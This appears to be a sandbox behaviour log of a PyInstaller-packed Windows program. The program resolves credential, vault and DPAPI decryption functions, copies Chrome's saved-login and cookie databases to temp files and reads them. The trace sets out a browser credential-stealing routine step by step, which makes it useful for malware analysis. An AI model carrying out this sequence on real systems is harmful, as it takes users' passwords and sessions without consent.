File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 19217, size_out = 19217 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 911, size_out = 911 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 4500, size_out = 4500 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 2295, size_out = 2295 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 71, size_out = 71 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 4399, size_out = 4399 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 2346, size_out = 2346 True 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\advapi32, type = file_attributes False 1
Module Load module_name = advapi32, base_address = 0x769f0000 True 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\crypt32, type = file_attributes False 1
Module Load module_name = crypt32, base_address = 0x75420000 True 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\kernel32, type = file_attributes False 1
Module Load module_name = kernel32, base_address = 0x76910000 True 1
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = RevertToSelf, address_out = 0x76a01562 True 1
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = ImpersonateLoggedOnUser, address_out = 0x769fc57a True 1
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = DuplicateTokenEx, address_out = 0x769fca24 True 1
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x76a0418e True 1
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = LookupPrivilegeValueA, address_out = 0x76a0404a True 1
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = ConvertSidToStringSidA, address_out = 0x76a2192a True 1
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = LocalAlloc, address_out = 0x76963363 True 1
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = GetTokenInformation, address_out = 0x76a0431c True 1
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = OpenProcess, address_out = 0x769559d7 True 1
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = OpenProcessToken, address_out = 0x76a04304 True 1
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x7695ca7c True 1
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = CredEnumerateA, address_out = 0x76a37381 True 1
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = CredFree, address_out = 0x769fb2ec True 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\msvcrt, type = file_attributes False 1
Module Load module_name = msvcrt, base_address = 0x76a90000 True 1
Module Get Address module_name = c:\windows\system32\msvcrt.dll, function = memcpy, address_out = 0x76a99910 True 1
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = LocalFree, address_out = 0x7695ca64 True 1
Module Get Address module_name = c:\windows\system32\crypt32.dll, function = CryptUnprotectData, address_out = 0x75455a7f True 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\vaultcli, type = file_attributes False 1
Module Load module_name = vaultcli, base_address = 0x6e710000 True 1
Module Get Address module_name = c:\windows\system32\vaultcli.dll, function = VaultEnumerateVaults, address_out = 0x6e712945 True 1
Module Get Address module_name = c:\windows\system32\vaultcli.dll, function = VaultOpenVault, address_out = 0x6e7126a9 True 1
Module Get Address module_name = c:\windows\system32\vaultcli.dll, function = VaultEnumerateItems, address_out = 0x6e713099 True 1
Module Get Address module_name = c:\windows\system32\vaultcli.dll, function = VaultGetItem, address_out = 0x6e713242 True 1
Module Get Address module_name = c:\windows\system32\vaultcli.dll, function = VaultFree, address_out = 0x6e714321 True 1
Module Get Address module_name = c:\windows\system32\vaultcli.dll, function = VaultCloseVault, address_out = 0x6e712718 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1001, size_out = 1001 True 1
File Create filename = c:\users\eebsym5\appdata\local\temp\9r5qk2, file_attributes = _O_RDWR, _O_NOINHERIT, _O_CREAT, _O_EXCL True 1
File Write filename = c:\users\eebsym5\appdata\local\temp\9r5qk2, size = 4 True 1
File Delete filename = c:\users\eebsym5\appdata\local\temp\9r5qk2 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 405, size_out = 405 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 4583, size_out = 4583 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 101, size_out = 101 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1092, size_out = 1092 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\_sqlite3.pyd, file_attributes = _O_RDONLY | _O_BINARY True 1
Module Load module_name = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\_sqlite3.pyd, base_address = 0x6e170000 True 1
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29~1\_sqlite3.pyd, function = init_sqlite3, address_out = 0x6e175c10 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 7762, size_out = 7762 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1706, size_out = 1706 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Python\PythonCore\2.7\Modules\pwd False 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Python\PythonCore\2.7\Modules\pwd False 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\pwd.pyd, file_attributes = _O_RDONLY | _O_BINARY True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\pwd.py, file_attributes = _O_RDONLY | _O_BINARY True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\pwd.pyw, file_attributes = _O_RDONLY | _O_BINARY True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\pwd.pyc, file_attributes = _O_RDONLY | _O_BINARY True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Python\PythonCore\2.7\Modules\grp False 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Python\PythonCore\2.7\Modules\grp False 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\grp.pyd, file_attributes = _O_RDONLY | _O_BINARY True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\grp.py, file_attributes = _O_RDONLY | _O_BINARY True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\grp.pyw, file_attributes = _O_RDONLY | _O_BINARY True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\grp.pyc, file_attributes = _O_RDONLY | _O_BINARY True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 4354, size_out = 4354 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 4959, size_out = 4959 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1147, size_out = 1147 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 5548, size_out = 5548 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 5882, size_out = 5882 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 9029, size_out = 9029 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 231, size_out = 231 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 90, size_out = 90 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 94, size_out = 94 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 611, size_out = 611 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 94, size_out = 94 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 975, size_out = 975 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 438, size_out = 438 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 94, size_out = 94 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 11182, size_out = 11182 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1952, size_out = 1952 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 18653, size_out = 18653 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 4608, size_out = 4608 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 13594, size_out = 13594 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1036, size_out = 1036 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 91, size_out = 91 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 659, size_out = 659 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 489, size_out = 489 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 89, size_out = 89 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 6511, size_out = 6511 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 298, size_out = 298 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 4718, size_out = 4718 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 225, size_out = 225 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 3235, size_out = 3235 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1369, size_out = 1369 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1398, size_out = 1398 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 14981, size_out = 14981 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 2463, size_out = 2463 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 22528, size_out = 22528 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 407, size_out = 407 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 5495, size_out = 5495 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 2166, size_out = 2166 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 2246, size_out = 2246 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 343, size_out = 343 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 358, size_out = 358 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 597, size_out = 597 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 425, size_out = 425 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 35306, size_out = 35306 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 660, size_out = 660 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1391, size_out = 1391 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 462, size_out = 462 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1393, size_out = 1393 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1038, size_out = 1038 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 2026, size_out = 2026 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 2192, size_out = 2192 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\Crypto.Cipher._DES3.pyd, file_attributes = _O_RDONLY | _O_BINARY True 1
Module Load module_name = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\Crypto.Cipher._DES3.pyd, base_address = 0x10000000 True 1
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29~1\crypto.cipher._des3.pyd, function = init_DES3, address_out = 0x100026d0 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1997, size_out = 1997 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 4370, size_out = 4370 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 15741, size_out = 15741 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 752, size_out = 752 True 1
File Get Info filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data, type = file_attributes True 1
File Get Info filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data\Local State, type = file_attributes True 1
File Create filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data\Local State, file_attributes = _O_RDONLY True 1
File Read filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data\Local State, size = 67148, size_out = 67147 True 1
File Get Info filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data, type = file_attributes True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, type = file_attributes False 1
File Get Info filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data, type = file_attributes True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, type = file_attributes False 1
File Create filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data, file_attributes = _O_RDONLY | _O_BINARY True 1
File Create filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, file_attributes = _O_WRONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data, size = 16384, size_out = 16384 True 1
File Write filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, size = 16384 True 1
File Read filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data, size = 16384, size_out = 2048 True 1
File Write filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, size = 2048 True 1
File Read filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data, size = 16384, size_out = 0 False 1
File Get Info filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data, type = file_attributes True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, type = file_attributes True 1
System Get Info type = Hardware Information True 1
System Get Info type = Operating System True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, type = file_attributes True 1
File Create filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, size = 100, size_out = 100 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, size = 2048, size_out = 2048 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq, size = 2048, size_out = 2048 True 1
File Delete filename = c:\users\eebsym5\appdata\local\temp\fvwresvqqzq True 1
File Get Info filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data\Default\Cookies, type = file_attributes True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = file_attributes False 1
File Get Info filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data\Default\Cookies, type = file_attributes True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = file_attributes False 1
File Create filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data\Default\Cookies, file_attributes = _O_RDONLY | _O_BINARY True 1
File Create filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, file_attributes = _O_WRONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data\Default\Cookies, size = 16384, size_out = 7168 True 1
File Write filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 7168 True 1
File Read filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data\Default\Cookies, size = 16384, size_out = 0 False 1
File Get Info filename = C:\Users\EEBsYm5\Local Settings\Application Data\Google\Chrome\User Data\Default\Cookies, type = file_attributes True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = file_attributes True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = file_attributes True 1
File Create filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 100, size_out = 100 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
